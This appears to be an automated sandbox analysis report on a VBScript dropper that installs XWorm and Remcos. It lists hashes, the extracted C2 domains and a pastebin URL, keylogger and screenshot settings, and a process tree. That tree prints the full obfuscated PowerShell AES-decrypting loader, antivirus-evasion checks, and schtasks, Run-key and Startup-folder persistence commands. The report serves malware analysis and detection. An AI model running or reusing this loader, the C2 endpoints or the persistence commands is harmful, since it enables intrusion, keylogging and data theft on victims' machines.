Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240709-en -
resource tags
arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system -
submitted
12-07-2024 16:56
Static task
static1
Behavioral task
behavioral1
Sample
package011.vbs
Resource
win7-20240708-en
General
-
Target
package011.vbs
-
Size
150KB
-
MD5
23df05b7be963f02a76cd7fb64a1cccc
-
SHA1
a361a5214b9cfa838b77b4349fa0898db400fd97
-
SHA256
a8e815c5920b41708193a747a8635f3a10d5fc933b6743177b5353a01ad76717
-
SHA512
01ac143a46a5b81f23621ec9654a5f347269033ac2ea7e751a6b1df4cd9aee51c2be1023379669b5044604312884b14eaff49099c79cfc4890049b688f1222e1
-
SSDEEP
1536:yZccvQGghdpPZp+ogsUJW4Wrle/PhG+/kery+bGsGI38sv5HnIgs:QghdpP+og0S7hO
Malware Config
Extracted
xworm
5.0
UxOlPOZZNwNV9srk
-
install_file
USB.exe
-
pastebin_url
https://pastebin.com/raw/Dh8E7H3R
Extracted
remcos
nutsDOG
remgod54.duckdns.org:9898
backto54.duckdns.org:9897
-
audio_folder
MicRecords
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
words.exe
-
copy_folder
word
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmcvbwxcdfgbfdfdddddddddddddddddderrfdv-TTAN7Q
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
true
-
take_screenshot_time
5
-
take_screenshot_title
homedepot,etsy,checkout
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/2376-29-0x0000000000400000-0x0000000000410000-memory.dmp family_xworm -
Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs
Processes:
Consciousness.pifBetter.pifKeeps.pifdescription pid process target process PID 1048 created 3408 1048 Consciousness.pif Explorer.EXE PID 1048 created 3408 1048 Consciousness.pif Explorer.EXE PID 1516 created 3408 1516 Better.pif Explorer.EXE PID 1516 created 3408 1516 Better.pif Explorer.EXE PID 4580 created 3408 4580 Keeps.pif Explorer.EXE PID 4580 created 3408 4580 Keeps.pif Explorer.EXE PID 1048 created 3408 1048 Consciousness.pif Explorer.EXE -
Blocklisted process makes network request 5 IoCs
Processes:
WScript.exepowershell.exeflow pid process 2 4708 WScript.exe 4 4708 WScript.exe 6 4708 WScript.exe 15 3256 powershell.exe 27 3256 powershell.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
WScript.exeurbyyu.exevyxsmk.exediwdmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation urbyyu.exe Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation vyxsmk.exe Key value queried \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\Control Panel\International\Geo\Nation diwdmd.exe -
Drops startup file 6 IoCs
Processes:
cmd.execmd.execmd.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EllaScope.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EllaScope.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DragonflySwift.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DragonflySwift.url cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ServerSwiftX.url cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ServerSwiftX.url cmd.exe -
Executes dropped EXE 7 IoCs
Processes:
urbyyu.exevyxsmk.exeConsciousness.pifBetter.pifdiwdmd.exeKeeps.pifRegAsm.exepid process 4720 urbyyu.exe 636 vyxsmk.exe 1048 Consciousness.pif 1516 Better.pif 4832 diwdmd.exe 4580 Keeps.pif 4996 RegAsm.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1176886754-713327781-2233697964-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\germano.vbs" powershell.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 3256 set thread context of 2376 3256 powershell.exe AddInProcess32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 1568 timeout.exe 5080 timeout.exe 924 timeout.exe -
Enumerates processes with tasklist 1 TTPs 6 IoCs
Processes:
tasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exepid process 5000 tasklist.exe 1632 tasklist.exe 3704 tasklist.exe 4224 tasklist.exe 3664 tasklist.exe 800 tasklist.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exepid process 436 schtasks.exe 2876 schtasks.exe 4532 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeAddInProcess32.exeConsciousness.pifBetter.pifKeeps.pifpid process 3256 powershell.exe 3256 powershell.exe 2376 AddInProcess32.exe 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 4580 Keeps.pif -
Suspicious use of AdjustPrivilegeToken 9 IoCs
Processes:
powershell.exeAddInProcess32.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exetasklist.exeRegAsm.exedescription pid process Token: SeDebugPrivilege 3256 powershell.exe Token: SeDebugPrivilege 2376 AddInProcess32.exe Token: SeDebugPrivilege 3664 tasklist.exe Token: SeDebugPrivilege 800 tasklist.exe Token: SeDebugPrivilege 5000 tasklist.exe Token: SeDebugPrivilege 1632 tasklist.exe Token: SeDebugPrivilege 3704 tasklist.exe Token: SeDebugPrivilege 4224 tasklist.exe Token: SeDebugPrivilege 4996 RegAsm.exe -
Suspicious use of FindShellTrayWindow 9 IoCs
Processes:
Consciousness.pifBetter.pifKeeps.pifpid process 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 4580 Keeps.pif 4580 Keeps.pif 4580 Keeps.pif -
Suspicious use of SendNotifyMessage 9 IoCs
Processes:
Consciousness.pifBetter.pifKeeps.pifpid process 1048 Consciousness.pif 1048 Consciousness.pif 1048 Consciousness.pif 1516 Better.pif 1516 Better.pif 1516 Better.pif 4580 Keeps.pif 4580 Keeps.pif 4580 Keeps.pif -
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
AddInProcess32.exeKeeps.pifpid process 2376 AddInProcess32.exe 4580 Keeps.pif -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
WScript.exepowershell.exeAddInProcess32.exeurbyyu.execmd.exevyxsmk.exeConsciousness.pifcmd.execmd.exedescription pid process target process PID 4708 wrote to memory of 3256 4708 WScript.exe powershell.exe PID 4708 wrote to memory of 3256 4708 WScript.exe powershell.exe PID 3256 wrote to memory of 4900 3256 powershell.exe cmd.exe PID 3256 wrote to memory of 4900 3256 powershell.exe cmd.exe PID 3256 wrote to memory of 2376 3256 powershell.exe AddInProcess32.exe PID 3256 wrote to memory of 2376 3256 powershell.exe AddInProcess32.exe PID 3256 wrote to memory of 2376 3256 powershell.exe AddInProcess32.exe PID 3256 wrote to memory of 2376 3256 powershell.exe AddInProcess32.exe PID 3256 wrote to memory of 2376 3256 powershell.exe AddInProcess32.exe PID 3256 wrote to memory of 2376 3256 powershell.exe AddInProcess32.exe PID 3256 wrote to memory of 2376 3256 powershell.exe AddInProcess32.exe PID 3256 wrote to memory of 2376 3256 powershell.exe AddInProcess32.exe PID 2376 wrote to memory of 4720 2376 AddInProcess32.exe urbyyu.exe PID 2376 wrote to memory of 4720 2376 AddInProcess32.exe urbyyu.exe PID 2376 wrote to memory of 4720 2376 AddInProcess32.exe urbyyu.exe PID 4720 wrote to memory of 4584 4720 urbyyu.exe cmd.exe PID 4720 wrote to memory of 4584 4720 urbyyu.exe cmd.exe PID 4720 wrote to memory of 4584 4720 urbyyu.exe cmd.exe PID 4584 wrote to memory of 3664 4584 cmd.exe tasklist.exe PID 4584 wrote to memory of 3664 4584 cmd.exe tasklist.exe PID 4584 wrote to memory of 3664 4584 cmd.exe tasklist.exe PID 4584 wrote to memory of 4036 4584 cmd.exe findstr.exe PID 4584 wrote to memory of 4036 4584 cmd.exe findstr.exe PID 4584 wrote to memory of 4036 4584 cmd.exe findstr.exe PID 2376 wrote to memory of 636 2376 AddInProcess32.exe vyxsmk.exe PID 2376 wrote to memory of 636 2376 AddInProcess32.exe vyxsmk.exe PID 2376 wrote to memory of 636 2376 AddInProcess32.exe vyxsmk.exe PID 4584 wrote to memory of 800 4584 cmd.exe tasklist.exe PID 4584 wrote to memory of 800 4584 cmd.exe tasklist.exe PID 4584 wrote to memory of 800 4584 cmd.exe tasklist.exe PID 4584 wrote to memory of 1904 4584 cmd.exe findstr.exe PID 4584 wrote to memory of 1904 4584 cmd.exe findstr.exe PID 4584 wrote to memory of 1904 4584 cmd.exe findstr.exe PID 636 wrote to memory of 3196 636 vyxsmk.exe cmd.exe PID 636 wrote to memory of 3196 636 vyxsmk.exe cmd.exe PID 636 wrote to memory of 3196 636 vyxsmk.exe cmd.exe PID 4584 wrote to memory of 2364 4584 cmd.exe cmd.exe PID 4584 wrote to memory of 2364 4584 cmd.exe cmd.exe PID 4584 wrote to memory of 2364 4584 cmd.exe cmd.exe PID 4584 wrote to memory of 4960 4584 cmd.exe findstr.exe PID 4584 wrote to memory of 4960 4584 cmd.exe findstr.exe PID 4584 wrote to memory of 4960 4584 cmd.exe findstr.exe PID 4584 wrote to memory of 2596 4584 cmd.exe cmd.exe PID 4584 wrote to memory of 2596 4584 cmd.exe cmd.exe PID 4584 wrote to memory of 2596 4584 cmd.exe cmd.exe PID 4584 wrote to memory of 1048 4584 cmd.exe Consciousness.pif PID 4584 wrote to memory of 1048 4584 cmd.exe Consciousness.pif PID 4584 wrote to memory of 1048 4584 cmd.exe Consciousness.pif PID 4584 wrote to memory of 1568 4584 cmd.exe timeout.exe PID 4584 wrote to memory of 1568 4584 cmd.exe timeout.exe PID 4584 wrote to memory of 1568 4584 cmd.exe timeout.exe PID 1048 wrote to memory of 3092 1048 Consciousness.pif cmd.exe PID 1048 wrote to memory of 3092 1048 Consciousness.pif cmd.exe PID 1048 wrote to memory of 3092 1048 Consciousness.pif cmd.exe PID 1048 wrote to memory of 4256 1048 Consciousness.pif cmd.exe PID 1048 wrote to memory of 4256 1048 Consciousness.pif cmd.exe PID 1048 wrote to memory of 4256 1048 Consciousness.pif cmd.exe PID 3092 wrote to memory of 4532 3092 cmd.exe schtasks.exe PID 3092 wrote to memory of 4532 3092 cmd.exe schtasks.exe PID 3092 wrote to memory of 4532 3092 cmd.exe schtasks.exe PID 3196 wrote to memory of 5000 3196 cmd.exe tasklist.exe PID 3196 wrote to memory of 5000 3196 cmd.exe tasklist.exe PID 3196 wrote to memory of 5000 3196 cmd.exe tasklist.exe PID 3196 wrote to memory of 1032 3196 cmd.exe findstr.exe
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3408
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\package011.vbs"2⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI54017336715515162301463169167087CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIRVKb4AMnkcGT+1lRhDq2wGvsgxIWAbGvnAKn/KLt4ftcExS0J6PGPkyqQaBny3dqVsssrgFa+JaPcIyUhJhQXOaB/AZP4wo1wuwJ1fJM5bAu+dP//NHHKoo4LQYwoqJjzElrkfA2WmjOHFvWL5ffOYOqkyqieKwtHphpXiVovPlmhcb0S1v2ezagT2Vmks746+5Af+ygpdewM/TjYc2J8AHemy9cMo/4hrwBfp1jBWlmuXqwV9h3co0UZW0jB2dz2VZbV7ZDoKUAVBW/V3vINzl7GZvVlGcAaOXds5ExG5fwVaodCcInqFM1QQXEnjpB1tTNSugmQYYGiubBh0AMgMkHz3uXM6qIv0ggixuYCK74Zy/4zVo5/uWR4xc7I8WYOtAiUEGaVGzDMhEmCKqyokWQ34dBuQANpSwdRyhRD8OmyRroc7e65DzHz/xZp2xVjvpAf9s+ckPY41fLm71nDtpTbFFSJTdaQnBf2ATv1zPJZ6fh+fmgfgGULgO4L+ldJPmPZUEK7wMlrGaPqzzWpRMxXXSZ1MOQL68UfsjW3GzYvo0H3iocVB81r9MIiLvZX8Y0HZly/LMji9VNcU+n7ofYCBsEnXZnvmtzLxiN1Jmk6WkoLPiiJ/FsQ764Iuc/zsUDRDD9mwyrIbngZyfN4zvnDo8TaH4+JQjvHEi6qihxvdbOY1AAv/usKcWSuzvFoJVHfSDlNBhpcW1Amcnv3SDckyFR61PGwdDxtZBwHOfQYQYDGwffp/4i9pSC5BCMw0xXmbBZu+0oG7U/vdwveQVOXsd67CQBHfIhjzuZOw5YnMedohBQo5WpTwAmdw/pXaBtxLMY8XlS/3wgiEKEsNfiObdNZNF4FcWqqBcxMCM7dNBr3P7yi1z8EGs9Plxf5Y6rbRh9ytLZ0lTnzs+I3QOe8wKOkARifHeztj8fNtSPzHi0a1QONAyeZQHl6K2sYfhGZO2djiLrs2sBusjxgv1Aybwq2e/EDmJY8ujuPGYk/KxIFwlkclKozCWCN/iRjeQgcxfHRxdOibiC9UouixNm6PZLetLNaXGL5onrZ4rursfSkQGxdSFAyfTMX88eb/fBP/pfsUv+JRoM/p+ox/syG9apC2cW4zQ7VWmDX2rbidh1eApWuowRe+CZczNSZezlT02ciH0U9MTyzG5GPIXbB68wAKePzG/E/ae0IAOuc0xmtjjgMWtMk+63rlSsv8VcBPVHaofdAOWT9w4BPLj9u1uOD8I0NIex+GOYS429KoBGJ/1BMzFAf5llNPlZN2jclE2KfdQ/Q4m6c/r4yqWD5JXMw9w4dLN6WyHkifaH1Y9FDYyejX8ckzJ8WvJAVXgmmN9ip8D3qOaugY7TmUXhXm0sL/6be/YScyAGkpfEyLqalKurxcJ9ARrhQ2axllqthk732UFRnZtMMG4kKJfh15lRbGniEQNknMMo8pldrew/J8sUOJUeE3zAMZX/T1x5LrEyQ254M05a7DZL3RdtXK+w3L1WFzN4sU4xp3n7XsYE0DlbDyTz+ufNUlBo9hA/Eid5vK+cEm+618JqvKlr8dehYjfgwr3iP86K5K3O3Mo0QWnwMb/29to/5qDss0mmXGspxFn9fmTIAyq7hqMpCfmv/RUZwMG3qetlNIzb6ReZLENyvPtmeLWQOOzJd6+KM4pp/GyJ9TjB4YfixpqPD4LSZ3Eng1BBqAY8XaI4djDN8t05f8Z9BHnwBJIww9r2sUySG54n+UNhdZYetqkqNJH/bbd6D6QPiVsXgdQTUXipSGCA7W2pL/kLCf7B8PQRtmRKYasYSYwU9CoBy5zgsaBbMUzDM4HeXhwgzQSX1rR/+hu0yHHQhlHb7nfrItcI1mMzkqH0mleO5Yss8HwOwn6LnoGSacAZOgsk3+HxlKWaIPSl9o3mhbi4zAtc6/isWyXcKJIF/KGoBWCJbXspQQul0p8kBpVnLniqck6MgBIHVEEdKUIKWA+jY75yCnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn TMItext'+'oe4j+e4jDescriptografado;e4j)-rEplACe ([CHar]67+[CHar]110+['+'CHar]73),[CHar]34 -cRePLACe e4jTMIe4j,[CHar]36)AQMinvOKe-EXpReSsion') -CREplacE 'e4j',[Char]39 -CREplacE([Char]65+[Char]81+[Char]77),[Char]124)|&( $verbosEPREFerEncE.tosTriNg()[1,3]+'x'-join'')3⤵
- Blocklisted process makes network request
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3256 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\germano.vbs"4⤵PID:4900
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Users\Admin\AppData\Local\Temp\urbyyu.exe"C:\Users\Admin\AppData\Local\Temp\urbyyu.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4720 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Technological Technological.cmd & Technological.cmd & exit6⤵
- Suspicious use of WriteProcessMemory
PID:4584 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3664 -
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"7⤵PID:4036
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:800 -
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"7⤵PID:1904
-
C:\Windows\SysWOW64\cmd.execmd /c md 1117027⤵PID:2364
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PayableAuthorsYaleCant" Recommendations7⤵PID:4960
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Jonathan + Hold + Average + Miniature + Lcd + Va + Floors + Thumbzilla + Dirt + Step + Libraries + Charm + Temperature + Considerable 111702\t7⤵PID:2596
-
C:\Users\Admin\AppData\Local\Temp\111702\Consciousness.pif111702\Consciousness.pif 111702\t7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1048 -
C:\Windows\SysWOW64\timeout.exetimeout 57⤵
- Delays execution with timeout.exe
PID:1568 -
C:\Users\Admin\AppData\Local\Temp\vyxsmk.exe"C:\Users\Admin\AppData\Local\Temp\vyxsmk.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:636 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k move Cardiff Cardiff.cmd & Cardiff.cmd & exit6⤵
- Suspicious use of WriteProcessMemory
PID:3196 -
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:5000 -
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"7⤵PID:1032
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1632 -
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"7⤵PID:4520
-
C:\Windows\SysWOW64\cmd.execmd /c md 7854777⤵PID:1560
-
C:\Windows\SysWOW64\findstr.exefindstr /V "PNTORTURERACERP" False7⤵PID:3436
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Height + Pulling + Conditions + Formed + Rod + Commented + Transit 785477\d7⤵PID:4088
-
C:\Users\Admin\AppData\Local\Temp\785477\Better.pif785477\Better.pif 785477\d7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:1516 -
C:\Windows\SysWOW64\timeout.exetimeout 57⤵
- Delays execution with timeout.exe
PID:5080 -
C:\Users\Admin\AppData\Local\Temp\diwdmd.exe"C:\Users\Admin\AppData\Local\Temp\diwdmd.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
PID:4832 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c copy Elect Elect.cmd & Elect.cmd6⤵PID:4588
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:3704 -
C:\Windows\SysWOW64\findstr.exefindstr /I "wrsa.exe opssvc.exe"7⤵PID:1872
-
C:\Windows\SysWOW64\tasklist.exetasklist7⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:4224 -
C:\Windows\SysWOW64\findstr.exefindstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"7⤵PID:3468
-
C:\Windows\SysWOW64\cmd.execmd /c md 7507667⤵PID:2688
-
C:\Windows\SysWOW64\findstr.exefindstr /V "carbonecologyalbanyjones" Apartments7⤵PID:4628
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b Triple + Boot + Rapidly + Steven + Electronic + Variance 750766\n7⤵PID:3028
-
C:\Users\Admin\AppData\Local\Temp\750766\Keeps.pif750766\Keeps.pif 750766\n7⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:4580 -
C:\Windows\SysWOW64\timeout.exetimeout 57⤵
- Delays execution with timeout.exe
PID:924 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Capture" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftServer Elite Technologies Inc\ServerSwiftX.js'" /sc minute /mo 5 /F2⤵
- Suspicious use of WriteProcessMemory
PID:3092 -
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Capture" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SwiftServer Elite Technologies Inc\ServerSwiftX.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:4532 -
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ServerSwiftX.url" & echo URL="C:\Users\Admin\AppData\Local\SwiftServer Elite Technologies Inc\ServerSwiftX.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ServerSwiftX.url" & exit2⤵
- Drops startup file
PID:4256 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Therefore" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureScope Dynamics\EllaScope.js'" /sc minute /mo 5 /F2⤵PID:2196
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Therefore" /tr "wscript //B 'C:\Users\Admin\AppData\Local\SecureScope Dynamics\EllaScope.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:436 -
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EllaScope.url" & echo URL="C:\Users\Admin\AppData\Local\SecureScope Dynamics\EllaScope.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EllaScope.url" & exit2⤵
- Drops startup file
PID:2620 -
C:\Windows\SysWOW64\cmd.execmd /c schtasks.exe /create /tn "Claimed" /tr "wscript //B 'C:\Users\Admin\AppData\Local\RapidScan Tech\DragonflySwift.js'" /sc minute /mo 5 /F2⤵PID:2988
-
C:\Windows\SysWOW64\schtasks.exeschtasks.exe /create /tn "Claimed" /tr "wscript //B 'C:\Users\Admin\AppData\Local\RapidScan Tech\DragonflySwift.js'" /sc minute /mo 5 /F3⤵
- Scheduled Task/Job: Scheduled Task
PID:2876 -
C:\Windows\SysWOW64\cmd.execmd /k echo [InternetShortcut] > "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DragonflySwift.url" & echo URL="C:\Users\Admin\AppData\Local\RapidScan Tech\DragonflySwift.js" >> "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DragonflySwift.url" & exit2⤵
- Drops startup file
PID:3068 -
C:\Users\Admin\AppData\Local\Temp\111702\RegAsm.exeC:\Users\Admin\AppData\Local\Temp\111702\RegAsm.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4996
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
144B
MD5a9a02988145925c6cad96f0b3aedcf6b
SHA1854b1d2b67d977799ff739bc3383d476c7e837f8
SHA256d94472891bf906d0471c206692833a3c54b9a9719f59206788e0f5fc5d3ebd25
SHA5120efcf08d70e907818ce325ddde83879aae9d79d3d0f322520441faa118dc768c7ce7874f60ea9535d3e741a5ca3feae5217ed5c94318b025f1646f2f4f265faf
-
Filesize
156B
MD5ad6c37ef980373e9bcbd14810fad34bc
SHA19c061a1b3608b7c7f1db7cd06c8246913ee11bda
SHA256ee85057c1a562fc405d03b2b6a651612ac688dff5c9eeae88a0c1e34e17c602c
SHA51230dc26060efcb4fd44be2d74cc4d33654ee0eb9039bd933c80b67afcc938bdba458cfa6bfc43d2ddb2f59dd6f9ddfe66951c56c61709a2dc02eac94e0e2ae97f
-
Filesize
915KB
MD5b06e67f9767e5023892d9698703ad098
SHA1acc07666f4c1d4461d3e1c263cf6a194a8dd1544
SHA2568498900e57a490404e7ec4d8159bee29aed5852ae88bd484141780eaadb727bb
SHA5127972c78acebdd86c57d879c12cb407120155a24a52fda23ddb7d9e181dd59dac1eb74f327817adbc364d37c8dc704f8236f3539b4d3ee5a022814924a1616943
-
Filesize
1.2MB
